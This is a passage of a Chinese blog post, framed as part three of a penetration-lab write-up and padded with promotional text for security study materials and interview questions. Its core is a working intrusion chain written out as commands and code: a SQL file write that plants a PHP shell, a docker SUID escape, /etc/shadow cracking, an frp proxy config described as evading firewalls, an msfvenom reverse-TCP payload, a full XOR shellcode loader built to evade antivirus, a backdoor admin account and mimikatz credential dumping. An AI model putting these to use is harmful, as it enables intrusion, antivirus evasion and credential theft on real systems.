网络安全最全内网渗透 记一次有趣的复杂靶场渗透(3)，2024年最新2024大厂网络安全面试经验

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供：

因篇幅有限，仅展示部分资料

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

exploit/linux/local/cve_2022_0995_watch_queue
exploit/linux/local/su_login

提不上去… 找一下flag,发现在/var/www


![](https://img-blog.csdnimg.cn/img_convert/b963073f685bbd25183166ba037cef53.png)


根据php里面的配置，数据库指向发现新的资产，利用账户密码去连接


![](https://img-blog.csdnimg.cn/img_convert/efb25db303125aef6f62586b11ebde3d.png)


用msf搭建socks代理：


![](https://img-blog.csdnimg.cn/img_convert/4d4e7b8ec7966bfddc3f6c03921573b0.png)

proxychains mysql -u admin -p -h 192.168.100.1

![](https://img-blog.csdnimg.cn/img_convert/10ed4b41a8dbd8e4a5ac996b2d24d2d1.png)


因为是默认页面就直接写入就好了：

select ‘<?php phpinfo()?>’ INTO OUTFILE ‘/var/www/html/test.php’;

![](https://img-blog.csdnimg.cn/img_convert/ccd1610176240a7564c8233af2c8906f.png)


执行命令上线，再操作一波：


![](https://img-blog.csdnimg.cn/img_convert/b4c2541122bf4d31e0dccc8975c6df1a.png)


上传到临时文件再赋予权限执行


![](https://img-blog.csdnimg.cn/img_convert/7b7d0594eaddbc565a49a97ff577a369.png)


用的kali集成的linpeas，内容比较多，这里已经提示了suid提权，找一下：


![](https://img-blog.csdnimg.cn/img_convert/248de72af08cfcd08223478000cc5327.png)


去https://gtfobins.github.io/gtfobins/docker/找到提权的向量：

sudo install -m =xs $(which docker) .
./docker run -v /:/mnt --rm -it alpine chroot /mnt sh

这里不是交互式的tty，所以失败了


![](https://img-blog.csdnimg.cn/img_convert/ab01225edda92755878a038fbc5abe5c.png)

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

提权也可以偷个懒，再次利用suggest模块exp提权：


![](https://img-blog.csdnimg.cn/img_convert/74b8437e6e00f0f20a3130c8b62ca387.png)


等待一会，即可上线，这里不得不说msf的提权真是强，特别在exp提权上，如果自己编译是会很多出错导致难以利用，互联网上的poc在不同环境都是有兼容性问题的,这里msf就已经考虑好了兼容性的问题：


![](https://img-blog.csdnimg.cn/img_convert/6715a286182a488131eb1e9b2c2c0ce4.png)


读取cat /etc/shadow密码破解（实战下还是有必要去破解一下的，因为很多单位用的密码都一样，只要能破解出明文，利用明文去横向将会显得非常重要）：


![](https://img-blog.csdnimg.cn/img_convert/f203e5def53e5a25596dbf8a5d99df57.png)


利用hashcat破解：

hashcat -m 1800 -a 0 hash.txt rockyou.txt

对应的明文：

$6$Zs4KmlUsMiwVLy2y$V8S5G3q7tpBMZip8Iv/H6i5ctHVFf6.fS.HXBw9Kyv96Qbc2ZHzHlYHkaHm8A5toyMA3J53JU.dc6ZCjRxhjV1:linuxrulez

拿到密码登录验证一下：linux-admin


![](https://img-blog.csdnimg.cn/img_convert/906ac26dd97623e0607670c09aff2aa8.png)


对同网段下的ip进行扫描，发现新的资产：


![](https://img-blog.csdnimg.cn/img_convert/59a17bfcdf348d5bd453ae29fdc8d132.png)


整理一下扫描的信息，（从这里之后的图片因为重置了靶场与之前的ip已经改变，不过问题不大），10.200.108.35的机器名是PC-FILESRV01 ，10.200.108.30的机器名是DC-SRV01，扫描结果也显示了是域控Domain Controllers，10.200.108.31的机器名是S-SRV01，http://10.200.108.30:80


![](https://img-blog.csdnimg.cn/img_convert/38682c09c7bd040f6456d1554d152b30.png)


再次搭建代理，这里直接用frp，frp的稳定性人尽皆知，这里就贴一下经常使用配置就好了：

./frps -c frps.ini

[common]
bind_port = 7000
token = Yuzusoft
tls_enable = true

客户端配置，实战中启用tls可以绕过态势感知、防火墙的拦截：

[common]
token = Yuzusoft
disable_custom_tls_first_byte = true
server_addr = 127.0.0.1
server_port = 7000
tls_enable = true

[socks5]
remote_port = 5444
plugin = socks5

![](https://img-blog.csdnimg.cn/img_convert/06385c0ceee67efc38139f82e8975b62.png)


![](https://img-blog.csdnimg.cn/img_convert/5d12496ac3e4c2b1bdb5d56e8da9ba16.png)


搭建完毕就可以访问 http://10.200.108.31/ 了:


![](https://img-blog.csdnimg.cn/img_convert/19ee8bfec2d979dc58d92e7eaa022068.png)


不晓得为什么burp出了什么问题，忍一下用浏览器来抓包，不难看出这里有个重置密码的参数让人感兴趣：


![](https://img-blog.csdnimg.cn/img_convert/c39cd7130f86704d89adde3744b8ef3f.png)


爆破用户名失败之后我重新翻找了之前mysql的数据库，找到了gurag用户：


![](https://img-blog.csdnimg.cn/img_convert/8d3e1e82af8f8fe4004417dbb98c02d8.png)


抓包分析发现gurag的token其实已经返回在返回包，一个简单的逻辑漏洞：


![](https://img-blog.csdnimg.cn/img_convert/25835bf9f9c03ae3914b8adb0138ff5c.png)


之后带着这个token去访问之前的页面即可：


![](https://img-blog.csdnimg.cn/img_convert/d8465e69ffe0bd9e6dadbf589cdc23d9.png)


登录之后一个典型的前端过滤上传：


![](https://img-blog.csdnimg.cn/img_convert/7d1a3763fb0554abcd0d4c00fbad5632.png)


根据之前目录扫描的结果，应该在images目录下


![](https://img-blog.csdnimg.cn/img_convert/05e24ccaac6a720abd6ff7e646ef4196.png)


![](https://img-blog.csdnimg.cn/img_convert/e978372fca3f989d83e766391f742ad9.png)


果不其然，直接一波php上传Getshell，直接拿到system权限：


![](https://img-blog.csdnimg.cn/img_convert/fe7c275050b6cdf078776d9a5fa424f3.png)


拿着进程去棱角社区进程识别看看，果然有杀毒，不过欺负一下微软的杀毒还是很轻松的：


![](https://img-blog.csdnimg.cn/img_convert/f98d6dc6d62b7ad5beb395f60d8392d7.png)


生成木马,本来想用https，但是上不了线，只能用tcp了

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.31.41 LPORT=8888 -f raw -o test.txt

写了分离的shellcode加载器：

#include
#include
#include
#include <Windows.h>

char Key[7] = { ‘Y’, ‘U’, ‘Z’, ‘S’, ‘O’, ‘F’, ‘T’ };
// 解密函数
int keyLength = 7;

void decrypt(std::vector& encryptedData) {
int keyIndex = 0; // 初始密钥索引为0

for (size_t i = 0; i < encryptedData.size(); ++i) {  
    encryptedData[i] = encryptedData[i] ^ Key[keyIndex]; // 使用当前密钥进行异或解密  
    keyIndex = (keyIndex + 1) % keyLength; // 更新密钥索引，确保在0到6之间循环  
}  

}

int main() {

// 读取 shellcode 从本地已经加密的 log 文件  
std::ifstream file("log.txt", std::ios::binary);  
std::vector<unsigned char> shellcode;  


if (file) {  
    file.seekg(0, std::ios::end);  
    size_t size = file.tellg();  
    shellcode.resize(size);  

    file.seekg(0, std::ios::beg);  
    file.read(reinterpret_cast<char*>(shellcode.data()), size);  
    file.close();  
}  
else {  
    std::cout << "open file fail" << std::endl;  
    return 1;  
}  
Sleep(35000);  
decrypt(shellcode);  
// 分配内存  
LPVOID allocMem = VirtualAlloc(NULL, shellcode.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);  
if (allocMem == NULL) {  
    std::cout << "内存分配" << std::endl;  
    return 1;  
}  
// 将 shellcode 拷贝到分配的内存中  
memcpy(allocMem, shellcode.data(), shellcode.size());  
// 执行 shellcode  
typedef void (*ShellcodeFunction)();  
ShellcodeFunction func = (ShellcodeFunction)allocMem;  
func();  

// 释放内存  
VirtualFree(allocMem, 0, MEM_RELEASE);  

return 0;  

}

shellcode加载器本地测试免杀通过了


![](https://img-blog.csdnimg.cn/img_convert/0c4de90de8309ce35dfdd831f998bcca.png)


成功上线：


![](https://img-blog.csdnimg.cn/img_convert/b91895f5ab6c5b6f21a1222e27c2a512.png)


传个vt看看，20/70，算了，能用就行：


![](https://img-blog.csdnimg.cn/img_convert/4083c1b9ea695483b9333d5b6d4cb183.png)


靶机一直没上线，可能是端口转发的问题，没办法了，虽然OPSEC原则上加用户是很糟糕的方法，但我这里还是加个用户登上去看看到底是怎么回事：

net user Yuzusoft XXMn9nJfUVEDx2Lk /add
net localgroup administrators Yuzusoft /add

![](https://img-blog.csdnimg.cn/img_convert/120998f29ca8997ec3e9c14b228354b0.png)


登上去才发现，好吧，这是一个经典错误，报了个dll未找到的错误（后来几天后同事提点发现是编译的问题）：


![](https://img-blog.csdnimg.cn/img_convert/37af22a149c076336586fcd759e4d67a.png)


请原谅我直接在UI内部关掉杀毒，之前还写过python的加载器，结果虚拟机之前快照重置了，就不再这里浪费时间了：


![](https://img-blog.csdnimg.cn/img_convert/dc40bb1fc5d71c062d2888a8389c241d.png)


经过一点点时间，上传木马执行上线：


![](https://img-blog.csdnimg.cn/img_convert/bdae3d70e185a51793e6f3373c2f9780.png)


转储密码哈希：

load mimikatz
kiwi_cmd sekurlsa::logonpasswords

报错说32位的不能访问64位的进程：


![](https://img-blog.csdnimg.cn/img_convert/3a6849510600c222efc001056aac33fd.png)


这里得找个64位的进程迁移过去

migrate xxxx

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！


王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。


对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！


【完整版领取方式在文末！！】


***93道网络安全面试题***


![](https://img-blog.csdnimg.cn/img_convert/6679c89ccd849f9504c48bb02882ef8d.png)








![](https://img-blog.csdnimg.cn/img_convert/07ce1a919614bde78921fb2f8ddf0c2f.png)





![](https://img-blog.csdnimg.cn/img_convert/44238619c3ba2d672b5b8dc4a529b01d.png)





内容实在太多，不一一截图了


### 黑客学习资源推荐


最后给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！


对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。


😝朋友们如果有需要的话，可以联系领取~

#### 1️⃣零基础入门


##### ① 学习路线


对于从来没有接触过网络安全的同学，我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**，大家跟着这个大的方向学习准没问题。


![image](https://img-blog.csdnimg.cn/img_convert/acb3c4714e29498573a58a3c79c775da.gif#pic_center)


##### ② 路线对应学习视频


同时每个成长路线对应的板块都有配套的视频提供：


![image-20231025112050764](https://img-blog.csdnimg.cn/874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)


#### 2️⃣视频配套工具&国内外网安书籍、文档


##### ① 工具


![](https://img-blog.csdnimg.cn/img_convert/d3f08d9a26927e48b1332a38401b3369.png#pic_center)


##### ② 视频


![image1](https://img-blog.csdnimg.cn/img_convert/f18acc028dc224b7ace77f2e260ba222.png#pic_center)


##### ③ 书籍


![image2](https://img-blog.csdnimg.cn/img_convert/769b7e13b39771b3a6e4397753dab12e.png#pic_center)

资源较为敏感，未展示全面，需要的最下面获取

![在这里插入图片描述](https://img-blog.csdnimg.cn/e4f9ac066e8c485f8407a99619f9c5b5.png#pic_center)![在这里插入图片描述](https://img-blog.csdnimg.cn/111f5462e7df433b981dc2430bb9ad39.png#pic_center)


##### ② 简历模板


![在这里插入图片描述](https://img-blog.csdnimg.cn/504b8be96bfa4dfb8befc2af49aabfa2.png#pic_center)

 **因篇幅有限，资料较为敏感仅展示部分资料，添加上方即可获取👆**




**网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**